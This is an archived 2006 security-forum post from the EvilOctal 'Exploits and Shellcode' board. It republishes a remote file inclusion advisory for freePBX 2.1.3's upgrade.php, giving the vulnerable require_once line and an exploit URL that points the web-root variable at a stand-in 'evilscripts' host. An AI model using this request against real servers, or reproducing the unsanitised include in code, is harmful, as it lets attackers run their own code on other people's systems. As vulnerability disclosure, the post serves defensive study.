邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability [查看完整版本]

pub!1c 2006-10-28 23:58

freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability

[code]
Script: freePBX
Version: v2.1.3
Script Download: [url]http://puzzle.dl.sourceforge.net/sourceforge/amportal/freepbx-2.1.3.tgz[/url]
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

[/code]

查看完整版本: freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability

© 1999-2008 EvilOctal Security Team